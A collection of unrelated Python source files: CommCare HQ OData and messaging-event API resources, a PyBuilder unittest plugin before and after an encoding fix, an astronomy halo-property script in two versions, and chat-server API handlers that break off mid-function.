return response
def create_response(self, request, data, response_class=HttpResponse,
**response_kwargs):
data['domain'] = request.domain
data['config_id'] = self.config_id
data['api_path'] = request.path
data['table_id'] = self.table_id
response = super(BaseODataResource, self).create_response(
request, data, response_class, **response_kwargs)
return add_odata_headers(response)
def detail_uri_kwargs(self, bundle_or_obj):
# Not sure why this is required but the feed 500s without it
return {
'pk': get_obj(bundle_or_obj)['_id']
}
def determine_format(self, request):
# Results should be sent as JSON
return 'application/json'
@location_safe
class ODataCaseResource(BaseODataResource):
def obj_get_list(self, bundle, domain, **kwargs):
config = get_document_or_404(CaseExportInstance, domain, self.config_id)
if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
raise ImmediateHttpResponse(
HttpForbidden(ugettext_noop(
"You do not have permission to view this feed."
))
)
query = get_case_export_base_query(domain, config.case_type)
for filter in config.get_filters():
query = query.filter(filter.to_es_filter())
if not bundle.request.couch_user.has_permission(
domain, 'access_all_locations'
):
query = query_location_restricted_cases(query, bundle.request)
return query
class Meta(v0_4.CommCareCaseResource.Meta):
authentication = ODataAuthentication()
resource_name = 'odata/cases'
serializer = ODataCaseSerializer()
limit = 2000
max_limit = 10000
def prepend_urls(self):
return [
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
]
@location_safe
class ODataFormResource(BaseODataResource):
def obj_get_list(self, bundle, domain, **kwargs):
config = get_document_or_404(FormExportInstance, domain, self.config_id)
if raise_odata_permissions_issues(bundle.request.couch_user, domain, config):
raise ImmediateHttpResponse(
HttpForbidden(ugettext_noop(
"You do not have permission to view this feed."
))
)
query = get_form_export_base_query(domain, config.app_id, config.xmlns, include_errors=False)
for filter in config.get_filters():
query = query.filter(filter.to_es_filter())
if not bundle.request.couch_user.has_permission(
domain, 'access_all_locations'
):
query = query_location_restricted_forms(query, bundle.request)
return query
class Meta(v0_4.XFormInstanceResource.Meta):
authentication = ODataAuthentication()
resource_name = 'odata/forms'
serializer = ODataFormSerializer()
limit = 2000
max_limit = 10000
def prepend_urls(self):
return [
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
self._meta.resource_name), self.wrap_view('dispatch_list')),
]
class MessagingEventResourceNew(HqBaseResource, ModelResource):
source = fields.DictField()
recipient = fields.DictField()
form = fields.DictField()
error = fields.DictField()
messages = fields.ListField()
def dehydrate(self, bundle):
bundle.data["domain"] = bundle.obj.parent.domain
return bundle
def dehydrate_status(self, bundle):
event = bundle.obj
if event.status == MessagingEvent.STATUS_COMPLETED and event.xforms_session_id:
return event.xforms_session.status_api
return MessagingEvent.STATUS_SLUGS.get(event.status, 'unknown')
def dehydrate_content_type(self, bundle):
return MessagingEvent.CONTENT_TYPE_SLUGS.get(bundle.obj.content_type, "unknown")
def dehydrate_source(self, bundle):
parent = bundle.obj.parent
return {
"id": parent.source_id,
"type": MessagingEvent.SOURCE_SLUGS.get(parent.source, 'unknown'),
"display": get_event_display_api(parent),
}
def dehydrate_recipient(self, bundle):
display_value = None
if bundle.obj.recipient_id:
display_value = case_or_user_id_to_name(bundle.obj.recipient_id, {
"couch_recipient_doc_type": bundle.obj.get_recipient_doc_type()
})
return {
"id": bundle.obj.recipient_id,
"type": MessagingSubEvent.RECIPIENT_SLUGS.get(bundle.obj.recipient_type, "unknown"),
"display": display_value or "unknown",
}
def dehydrate_form(self, bundle):
event = bundle.obj
if event.content_type not in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):
return None
submission_id = None
if event.xforms_session_id:
submission_id = event.xforms_session.submission_id
return {
"app_id": bundle.obj.app_id,
"form_unique_id": bundle.obj.form_unique_id,
"form_name": bundle.obj.form_name,
"form_submission_id": submission_id,
}
def dehydrate_error(self, bundle):
event = bundle.obj
if not event.error_code:
return None
return {
"code": event.error_code,
"message": MessagingEvent.ERROR_MESSAGES.get(event.error_code, None),
"message_detail": event.additional_error_text
}
def dehydrate_messages(self, bundle):
event = bundle.obj
if event.content_type == MessagingEvent.CONTENT_EMAIL:
return self._get_messages_for_email(event)
if event.content_type in (MessagingEvent.CONTENT_SMS, MessagingEvent.CONTENT_SMS_CALLBACK):
return self._get_messages_for_sms(event)
if event.content_type in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):
return self._get_messages_for_survey(event)
return [] # see corehq.apps.reports.standard.sms.MessageEventDetailReport.rows
def _get_messages_for_email(self, event):
try:
email = Email.objects.get(messaging_subevent=event.pk)
content = email.body
recipient_address = email.recipient_address
except Email.DoesNotExist:
content = '-'
recipient_address = '-'
return [{
"date": event.date,
"type": "email",
"direction": "outgoing",
"content": content,
"status": MessagingEvent.STATUS_SLUGS.get(event.status, 'unknown'),
"backend": "email",
"contact": recipient_address
}]
def _get_messages_for_sms(self, event):
messages = SMS.objects.filter(messaging_subevent_id=event.pk)
return self._get_message_dicts_for_sms(event, messages, "sms")
def _get_messages_for_survey(self, event):
if not event.xforms_session_id:
return []
xforms_session = event.xforms_session
if not xforms_session:
return []
messages = SMS.objects.filter(xforms_session_couch_id=xforms_session.couch_id)
type_ = "ivr" if event.content_type == MessagingEvent.CONTENT_IVR_SURVEY else "sms"
return self._get_message_dicts_for_sms(event, messages, type_)
def _get_message_dicts_for_sms(self, event, messages, type_):
message_dicts = []
for sms in messages:
if event.status != MessagingEvent.STATUS_ERROR:
status, _ = get_sms_status_display_raw(sms)
else:
status = MessagingEvent.STATUS_SLUGS.get(event.status, "unknown")
message_dicts.append({
"date": sms.date,
"type": type_,
"direction": SMS.DIRECTION_SLUGS.get(sms.direction, "unknown"),
"content": sms.text,
"status": status,
"backend": get_backend_name(sms.backend_id) or sms.backend_id,
"contact": sms.phone_number
})
return message_dicts
def build_filters(self, filters=None, **kwargs):
# Custom filtering for date etc
# see corehq.apps.reports.standard.sms.MessagingEventsReport.get_filters
return super(MessagingEventResourceNew, self).build_filters(filters, **kwargs)
class Meta(object):
queryset = MessagingSubEvent.objects.all()
include_resource_uri = False
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'messaging-event'
authentication = RequirePermissionAuthentication(Permissions.edit_data)
authorization = DomainAuthorization('parent__domain')
paginator_class = NoCountingPaginator
excludes = {
"error_code",
"additional_error_text",
"app_id",
"form_name",
"form_unique_id",
"recipient_id",
"recipient_type",
}
filtering = {
# this is needed for the domain filtering but any values passed in via the URL get overridden
"domain": ('exact',),
"date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'), # TODO: convert to date.gt etc
# "source": ('exact',), # TODO
"content_type": ('exact',), # TODO: convert from slug
"status": ('exact',), # TODO: convert from slug
"error_code": ('exact',), # TODO
"case_id": ('exact',),
# "contact": ('exact',), # TODO
# "parent": ('exact',), # TODO
}
ordering = [
'date',
]
class MessagingEventResource(HqBaseResource, ModelResource):
content_type_display = fields.CharField(attribute='get_content_type_display')
recipient_type_display = fields.CharField(attribute='get_recipient_type_display')
status_display = fields.CharField(attribute='get_status_display')
source_display = fields.CharField(attribute='get_source_display')
class Meta(object):
queryset = MessagingEvent.objects.all()
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
resource_name = 'messaging-event-old'
authentication = RequirePermissionAuthentication(Permissions.edit_data)
authorization = DomainAuthorization()
paginator_class = NoCountingPaginator
filtering = {
# this is needed for the domain filtering but any values passed in via the URL get overridden
"domain": ('exact',),
"date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
"source": ('exact',),
"content_type": ('exact',),
"status": ('exact',),
}
ordering = [
'date',
]
|
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2015 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from StringIO import StringIO
except ImportError as e:
from io import StringIO
import sys
import unittest
from pybuilder.core import init, task, description, use_plugin
from pybuilder.errors import BuildFailedException
from pybuilder.utils import discover_modules_matching, render_report
from pybuilder.ci_server_interaction import test_proxy_for
from pybuilder.terminal import print_text_line
use_plugin("python.core")
if sys.version_info < (2, 7):
TextTestResult = unittest._TextTestResult # brought to you by 2.6
else:
TextTestResult = unittest.TextTestResult
class TestNameAwareTextTestRunner(unittest.TextTestRunner):
def __init__(self, logger, stream):
self.logger = logger
super(TestNameAwareTextTestRunner, self).__init__(stream=stream)
def _makeResult(self):
return TestNameAwareTestResult(self.logger, self.stream, self.descriptions, self.verbosity)
class TestNameAwareTestResult(TextTestResult):
def __init__(self, logger, stream, descriptions, verbosity):
self.test_names = []
self.failed_test_names_and_reasons = {}
self.logger = logger
super(TestNameAwareTestResult, self).__init__(stream, descriptions, verbosity)
def startTest(self, test):
self.test_names.append(test)
self.logger.debug("starting %s", test)
super(TestNameAwareTestResult, self).startTest(test)
def addError(self, test, err):
exception_type, exception, traceback = err
self.failed_test_names_and_reasons[test] = '{0}: {1}'.format(exception_type, exception).replace('\'', '')
super(TestNameAwareTestResult, self).addError(test, err)
def addFailure(self, test, err):
exception_type, exception, traceback = err
self.failed_test_names_and_reasons[test] = '{0}: {1}'.format(exception_type, exception).replace('\'', '')
super(TestNameAwareTestResult, self).addFailure(test, err)
@init
def init_test_source_directory(project):
project.set_property_if_unset("dir_source_unittest_python", "src/unittest/python")
project.set_property_if_unset("unittest_module_glob", "*_tests")
project.set_property_if_unset("unittest_file_suffix", None) # deprecated, use unittest_module_glob.
project.set_property_if_unset("unittest_test_method_prefix", None)
@task
@description("Runs unit tests based on Python's unittest module")
def run_unit_tests(project, logger):
test_dir = _register_test_and_source_path_and_return_test_dir(project, sys.path)
unittest_file_suffix = project.get_property("unittest_file_suffix")
if unittest_file_suffix is not None:
logger.warn("unittest_file_suffix is deprecated, please use unittest_module_glob")
module_glob = "*{0}".format(unittest_file_suffix)
if module_glob.endswith(".py"):
WITHOUT_DOT_PY = slice(0, -3)
module_glob = module_glob[WITHOUT_DOT_PY]
project.set_property("unittest_module_glob", module_glob)
else:
module_glob = project.get_property("unittest_module_glob")
logger.info("Executing unittest Python modules in %s", test_dir)
logger.debug("Including files matching '%s'", module_glob)
try:
test_method_prefix = project.get_property("unittest_test_method_prefix")
result, console_out = execute_tests_matching(logger, test_dir, module_glob, test_method_prefix)
if result.testsRun == 0:
logger.warn("No unittests executed.")
else:
logger.info("Executed %d unittests", result.testsRun)
write_report("unittest", project, logger, result, console_out)
if not result.wasSuccessful():
raise BuildFailedException("There were %d test error(s) and %d failure(s)"
% (len(result.errors), len(result.failures)))
logger.info("All unittests passed.")
except ImportError as e:
import traceback
_, _, import_error_traceback = sys.exc_info()
file_with_error, error_line, _, statement_causing_error = traceback.extract_tb(import_error_traceback)[-1]
logger.error("Import error in unittest file {0}, due to statement '{1}' on line {2}".format(
file_with_error, statement_causing_error, error_line))
logger.error("Error importing unittests: %s", e)
raise BuildFailedException("Unable to execute unit tests.")
def execute_tests(logger, test_source, suffix, test_method_prefix=None):
return execute_tests_matching(logger, test_source, "*{0}".format(suffix), test_method_prefix)
def execute_tests_matching(logger, test_source, file_glob, test_method_prefix=None):
output_log_file = StringIO()
try:
test_modules = discover_modules_matching(test_source, file_glob)
loader = unittest.defaultTestLoader
if test_method_prefix:
loader.testMethodPrefix = test_method_prefix
tests = loader.loadTestsFromNames(test_modules)
result = TestNameAwareTextTestRunner(logger, output_log_file).run(tests)
return result, output_log_file.getvalue()
finally:
output_log_file.close()
def _register_test_and_source_path_and_return_test_dir(project, system_path):
test_dir = project.expand_path("$dir_source_unittest_python")
system_path.insert(0, test_dir)
system_path.insert(0, project.expand_path("$dir_source_main_python"))
return test_dir
def write_report(name, project, logger, result, console_out):
project.write_report("%s" % name, console_out)
report = {"tests-run": result.testsRun,
"errors": [],
"failures": []}
for error in result.errors:
report["errors"].append({"test": error[0].id(),
"traceback": error[1]})
logger.error("Test has error: %s", error[0].id())
if project.get_property("verbose"):
print_text_line(error[1])
for failure in result.failures:
report["failures"].append({"test": failure[0].id(),
"traceback": failure[1]})
logger.error("Test failed: %s", failure[0].id())
if project.get_property("verbose"):
print_text_line(failure[1])
project.write_report("%s.json" % name, render_report(report))
report_to_ci_server(project, result)
def report_to_ci_server(project, result):
for test_name in result.test_names:
with test_proxy_for(project).and_test_name(test_name) as test:
if test_name in result.failed_test_names_and_reasons:
test.fails(result.failed_test_names_and_reasons.get(test_name))
Encode exception text properly
We cannot assume that the exception text is ascii, so simply sticking
the exception in a string interpolation might fail. Encoding the
exception text as utf-8 fixes the problem described by @schlomo and thus
resolves #121.
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2015 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from StringIO import StringIO
except ImportError as e:
from io import StringIO
import sys
import unittest
from pybuilder.core import init, task, description, use_plugin
from pybuilder.errors import BuildFailedException
from pybuilder.utils import discover_modules_matching, render_report
from pybuilder.ci_server_interaction import test_proxy_for
from pybuilder.terminal import print_text_line
use_plugin("python.core")
if sys.version_info < (2, 7):
TextTestResult = unittest._TextTestResult # brought to you by 2.6
else:
TextTestResult = unittest.TextTestResult
class TestNameAwareTextTestRunner(unittest.TextTestRunner):
def __init__(self, logger, stream):
self.logger = logger
super(TestNameAwareTextTestRunner, self).__init__(stream=stream)
def _makeResult(self):
return TestNameAwareTestResult(self.logger, self.stream, self.descriptions, self.verbosity)
class TestNameAwareTestResult(TextTestResult):
def __init__(self, logger, stream, descriptions, verbosity):
self.test_names = []
self.failed_test_names_and_reasons = {}
self.logger = logger
super(TestNameAwareTestResult, self).__init__(stream, descriptions, verbosity)
def startTest(self, test):
self.test_names.append(test)
self.logger.debug("starting %s", test)
super(TestNameAwareTestResult, self).startTest(test)
def addError(self, test, err):
exception_type, exception, traceback = err
self.failed_test_names_and_reasons[test] = '{0}: {1}'.format(exception_type, exception.encode("utf-8")).replace('\'', '')
super(TestNameAwareTestResult, self).addError(test, err)
def addFailure(self, test, err):
exception_type, exception, traceback = err
self.failed_test_names_and_reasons[test] = '{0}: {1}'.format(exception_type, exception.encode("utf-8")).replace('\'', '')
super(TestNameAwareTestResult, self).addFailure(test, err)
@init
def init_test_source_directory(project):
project.set_property_if_unset("dir_source_unittest_python", "src/unittest/python")
project.set_property_if_unset("unittest_module_glob", "*_tests")
project.set_property_if_unset("unittest_file_suffix", None) # deprecated, use unittest_module_glob.
project.set_property_if_unset("unittest_test_method_prefix", None)
@task
@description("Runs unit tests based on Python's unittest module")
def run_unit_tests(project, logger):
test_dir = _register_test_and_source_path_and_return_test_dir(project, sys.path)
unittest_file_suffix = project.get_property("unittest_file_suffix")
if unittest_file_suffix is not None:
logger.warn("unittest_file_suffix is deprecated, please use unittest_module_glob")
module_glob = "*{0}".format(unittest_file_suffix)
if module_glob.endswith(".py"):
WITHOUT_DOT_PY = slice(0, -3)
module_glob = module_glob[WITHOUT_DOT_PY]
project.set_property("unittest_module_glob", module_glob)
else:
module_glob = project.get_property("unittest_module_glob")
logger.info("Executing unittest Python modules in %s", test_dir)
logger.debug("Including files matching '%s'", module_glob)
try:
test_method_prefix = project.get_property("unittest_test_method_prefix")
result, console_out = execute_tests_matching(logger, test_dir, module_glob, test_method_prefix)
if result.testsRun == 0:
logger.warn("No unittests executed.")
else:
logger.info("Executed %d unittests", result.testsRun)
write_report("unittest", project, logger, result, console_out)
if not result.wasSuccessful():
raise BuildFailedException("There were %d test error(s) and %d failure(s)"
% (len(result.errors), len(result.failures)))
logger.info("All unittests passed.")
except ImportError as e:
import traceback
_, _, import_error_traceback = sys.exc_info()
file_with_error, error_line, _, statement_causing_error = traceback.extract_tb(import_error_traceback)[-1]
logger.error("Import error in unittest file {0}, due to statement '{1}' on line {2}".format(
file_with_error, statement_causing_error, error_line))
logger.error("Error importing unittests: %s", e)
raise BuildFailedException("Unable to execute unit tests.")
def execute_tests(logger, test_source, suffix, test_method_prefix=None):
return execute_tests_matching(logger, test_source, "*{0}".format(suffix), test_method_prefix)
def execute_tests_matching(logger, test_source, file_glob, test_method_prefix=None):
output_log_file = StringIO()
try:
test_modules = discover_modules_matching(test_source, file_glob)
loader = unittest.defaultTestLoader
if test_method_prefix:
loader.testMethodPrefix = test_method_prefix
tests = loader.loadTestsFromNames(test_modules)
result = TestNameAwareTextTestRunner(logger, output_log_file).run(tests)
return result, output_log_file.getvalue()
finally:
output_log_file.close()
def _register_test_and_source_path_and_return_test_dir(project, system_path):
test_dir = project.expand_path("$dir_source_unittest_python")
system_path.insert(0, test_dir)
system_path.insert(0, project.expand_path("$dir_source_main_python"))
return test_dir
def write_report(name, project, logger, result, console_out):
project.write_report("%s" % name, console_out)
report = {"tests-run": result.testsRun,
"errors": [],
"failures": []}
for error in result.errors:
report["errors"].append({"test": error[0].id(),
"traceback": error[1]})
logger.error("Test has error: %s", error[0].id())
if project.get_property("verbose"):
print_text_line(error[1])
for failure in result.failures:
report["failures"].append({"test": failure[0].id(),
"traceback": failure[1]})
logger.error("Test failed: %s", failure[0].id())
if project.get_property("verbose"):
print_text_line(failure[1])
project.write_report("%s.json" % name, render_report(report))
report_to_ci_server(project, result)
def report_to_ci_server(project, result):
for test_name in result.test_names:
with test_proxy_for(project).and_test_name(test_name) as test:
if test_name in result.failed_test_names_and_reasons:
test.fails(result.failed_test_names_and_reasons.get(test_name))
|
import h5py as hdf
from addHaloInfo import find_indices
from astLib import astStats
import numpy as np
from calc_cluster_props import findLOSV, findClusterCenterRedshift, calc_mass_Saro
# silly stuff
import sys
import time
def spinning_cursor():
while True:
for cursor in '|/-\\':
yield cursor
spinner = spinning_cursor()
with hdf.File('out1204878_halo.hdf5', 'r') as f:
dset = f[f.keys()[0]]
data = dset.value
# now we need to make a mask for the data -- HETDEX DEPTH!!!
mask1 = (data['M200']/0.72 >= 1e13) & (data['Z'] < 0.5)
mask2 = (data['g'] < 22.) | (data['Oii'] > 3.5)
mask = mask1 & mask2
# we'll use the mask to make all the changes and then consolidate back.
dataMasked = data[mask]
#dataMasked = data
hids = np.unique(dataMasked['HALOID'])
halos = find_indices(dataMasked['HALOID'], hids)
for i,h in enumerate(halos):
if len(h) < 5:
dataMasked['CLUSZ'][h] = -1.
dataMasked['LOSV'][h] = -1.
dataMasked['LOSVD'][h] = -1.
elif 5 <= len(h) < 15:
dataMasked[h] = findClusterCenterRedshift(dataMasked[h])
dataMasked[h] = findLOSV(dataMasked[h])
dataMasked['LOSVD'][h] =\
astStats.gapperEstimator(dataMasked['LOSV'][h])
elif 15 <= len(h):
#find the cluster redshifts
dataMasked[h] = findClusterCenterRedshift(dataMasked[h])
#find the LOSV
dataMasked[h] = findLOSV(dataMasked[h])
# find the LOSVD
dataMasked['LOSVD'][h] =\
astStats.biweightScale_test(dataMasked['LOSV'][h],
tuningConstant=9.0)
if not dataMasked['CLUSZ'][h][0] == -1.0:
# finally the mass
dataMasked['MASS'][h] = calc_mass_Saro(dataMasked[h])
else:
pass
sys.stdout.write(spinner.next())
sys.stdout.flush()
sys.stdout.write('\b')
# now we make another new file
#with hdf.File('out1204878_complete.hdf5', 'w') as f:
with hdf.File('out1204878_hetdex.hdf5', 'w') as f:
# data[mask] = dataMasked
f['dset_complete'] = dataMasked
f.flush()
rework to not rely on haloinfo
this will change again in the future to make it a more stand alone
thing.
import h5py as hdf
from addHaloInfo import find_indices
from astLib import astStats
import numpy as np
from calc_cluster_props import findLOSV, findClusterCenterRedshift, calc_mass_Saro
def updateArray(data):
from numpy.lib import recfunctions as rfns
''' Makes the new fields that we are going to add things into in the
functions above. This should only be called once.
'''
print 'update array...'
newData = -np.ones(len(data))
data = rfns.append_fields(data, ['CLUSZ', 'LOSV', 'LOSVD', 'MASS'],
[newData, newData, newData, newData], dtypes='>f4', usemask=False)
return data
# silly stuff
import sys
import time
def spinning_cursor():
while True:
for cursor in '|/-\\':
yield cursor
spinner = spinning_cursor()
#with hdf.File('out1204878_halo.hdf5', 'r') as f:
with hdf.File('out1204878_allGalaxies.hdf5', 'r') as f:
dset = f[f.keys()[0]]
data = dset.value
data = updateArray(data)
# now we need to make a mask for the data -- HETDEX DEPTH!!!
#mask1 = (data['M200']/0.72 >= 1e13) & (data['Z'] < 0.5)
#mask2 = (data['g'] < 22.) | (data['Oii'] > 3.5)
#mask = mask1 & mask2
# we'll use the mask to make all the changes and then consolidate back.
#dataMasked = data[mask]
dataMasked = data
hids = np.unique(dataMasked['HALOID'])
halos = find_indices(dataMasked['HALOID'], hids)
for i,h in enumerate(halos):
if len(h) < 5:
dataMasked['CLUSZ'][h] = -1.
dataMasked['LOSV'][h] = -1.
dataMasked['LOSVD'][h] = -1.
elif 5 <= len(h) < 15:
dataMasked[h] = findClusterCenterRedshift(dataMasked[h])
dataMasked[h] = findLOSV(dataMasked[h])
dataMasked['LOSVD'][h] =\
astStats.gapperEstimator(dataMasked['LOSV'][h])
elif 15 <= len(h):
#find the cluster redshifts
dataMasked[h] = findClusterCenterRedshift(dataMasked[h])
#find the LOSV
dataMasked[h] = findLOSV(dataMasked[h])
# find the LOSVD
dataMasked['LOSVD'][h] =\
astStats.biweightScale_test(dataMasked['LOSV'][h],
tuningConstant=9.0)
if not dataMasked['CLUSZ'][h][0] == -1.0:
# finally the mass
dataMasked['MASS'][h] = calc_mass_Saro(dataMasked[h])
else:
pass
sys.stdout.write(spinner.next())
sys.stdout.flush()
sys.stdout.write('\b')
# now we make another new file
#with hdf.File('out1204878_complete.hdf5', 'w') as f:
#with hdf.File('out1204878_hetdex.hdf5', 'w') as f:
with hdf.File('out1204878_allGalaxies_props.hdf5', 'w') as f:
# data[mask] = dataMasked
f['dset_complete'] = dataMasked
f.flush()
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
from uuid import uuid4 as uuid
from activitystreams.models.activity import Activity
from dino.config import ApiTargets
from dino.config import ErrorCodes as ECodes
from dino.hooks import *
__author__ = 'Oscar Eriksson <oscar@thenetcircle.com>'
logger = logging.getLogger(__name__)
def connect() -> (int, None):
"""
connect to the server
:return: {'status_code': 200}
"""
environ.env.observer.emit('on_connect', (None, None))
return ECodes.OK, None
def on_login(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
event sent directly after a connection has successfully been made, to get the user_id for this connection
:param data: activity streams format, needs actor.id (user id) and actor.summary (user name)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
environ.env.observer.emit('on_login', (data, activity))
return ECodes.OK, None
def on_delete(data: dict, activity: Activity):
environ.env.observer.emit('on_delete', (data, activity))
return ECodes.OK, None
def on_message(data, activity: Activity):
"""
send any kind of message/event to a target user/room
object.url: target channel_id
target.id: target room_id
actor.id: sender user_id
actor.url: sender room_id
:param data: activity streams format, must include target.id (room/user id) and object.url (channel id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: {'status_code': ECodes.OK, 'data': '<same AS as client sent, plus timestamp>'}
"""
room_id = activity.target.id
from_room_id = activity.actor.url
# only if cross-room should we broadcast the origin room id with the activity; less confusion for clients
if from_room_id is not None and from_room_id == room_id:
del data['actor']['url']
if activity.target.object_type == 'room':
activity.target.display_name = utils.get_room_name(activity.target.id)
activity.object.summary = utils.get_channel_name(activity.object.url)
else:
activity.target.display_name = utils.get_user_name_for(activity.target.id)
activity.object.summary = ''
activity.object.url = ''
activity.actor.summary = environ.env.session.get(SessionKeys.user_name.value)
data['actor']['summary'] = activity.actor.summary
data['target']['displayName'] = activity.target.display_name
data['object']['summary'] = activity.object.summary
environ.env.observer.emit('on_message', (data, activity))
return ECodes.OK, data
def on_ban(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
ban a user from a room (if user is an owner/admin/moderator)
target.id: the uuid of the room that the user is in
target.displayName: the room name
object.id: the id of the user to kick
object.content: the name of the user to kick
object.summary: the ban time, e.g.
actor.id: the id of the kicker
actor.content: the name of the kicker
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_ban', (data, activity))
environ.env.observer.emit('on_kick', (data, activity))
return ECodes.OK, None
def on_kick(data: dict, activity: Activity) -> (int, None):
"""
kick a user from a room (if user is an owner)
target.id: the uuid of the room that the user is in
target.displayName: the room name
object.id: the id of the user to kick
object.content: the name of the user to kick
actor.id: the id of the kicker
actor.content: the name of the kicker
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_kick', (data, activity))
return ECodes.OK, None
def on_whisper(data: dict, activity: Activity) -> (int, None):
"""
whisper to another person in the same room, only that person will receive the event. Functions as a private message
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_whisper', (data, activity))
return ECodes.OK, None
def on_invite(data: dict, activity: Activity) -> (int, None):
"""
invite a user to the a room this user is in
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_invite', (data, activity))
return ECodes.OK, None
def on_request_admin(data: dict, activity: Activity) -> (int, None):
"""
request the presence of an admin in the current room
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<error message>'}
"""
environ.env.observer.emit('on_request_admin', (data, activity))
return ECodes.OK, None
def on_create(data: dict, activity: Activity) -> (int, dict):
"""
create a new room
:param data: activity streams format, must include target.display_name (room name) and object.id (channel id)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': ECodes.OK, 'data': '<same AS as in the request, with addition of target.id (generated UUID
for the new room>'}, else: {'status_code': 400, 'data': '<error message>'}
"""
# generate a uuid for this room
activity.target.id = str(uuid())
data['target']['id'] = activity.target.id
environ.env.observer.emit('on_create', (data, activity))
return ECodes.OK, data
def on_set_acl(data: dict, activity: Activity) -> (int, str):
"""
change ACL of a room; only allowed if the user is the owner of the room
:param data: activity streams, acls as attachments to object with object_type as acl name and content as acl value
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
environ.env.observer.emit('on_set_acl', (data, activity))
return ECodes.OK, None
def on_get_acl(data: dict, activity: Activity) -> (int, Union[str, dict]):
"""
change ACL of a room; only allowed if the user is the owner of the room
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<AS with acl as object.attachments>'}
"""
if activity.target.object_type == ApiTargets.CHANNEL:
acls = utils.get_acls_for_channel(activity.target.id)
else:
acls = utils.get_acls_for_room(activity.target.id)
environ.env.observer.emit('on_get_acl', (data, activity))
return ECodes.OK, utils.activity_for_get_acl(activity, acls)
def on_status(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
change online status
:param data: activity streams format, needs actor.id (user id), actor.summary (user name) and verb
(online/invisible/offline)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
environ.env.observer.emit('on_status', (data, activity))
return ECodes.OK, None
def on_history(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
get the history of a room
the 'updated' field is optional, and if set history since that point will be returned (only if dino has been
configured with the history type 'unread' instead of 'top')
:param data: activity streams format
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
:return: if ok: {'status_code': 200}, else: {'status_code': 400, 'data': '<some error message>'}
"""
room_id = activity.target.id
user_id = activity.actor.id
last_read = activity.updated
messages = utils.get_history_for_room(room_id, user_id, last_read)
environ.env.observer.emit('on_history', (data, activity))
return ECodes.OK, utils.activity_for_history(activity, messages)
def on_join(data: dict, activity: Activity) -> (int, Union[str, None]):
"""
join a room
:param data: activity streams format, need actor.id (user id), target.id (user id), actor.summary (user name)
:param activity: the parsed activity, supplied by @pre_process decorator, NOT by calling endpoint
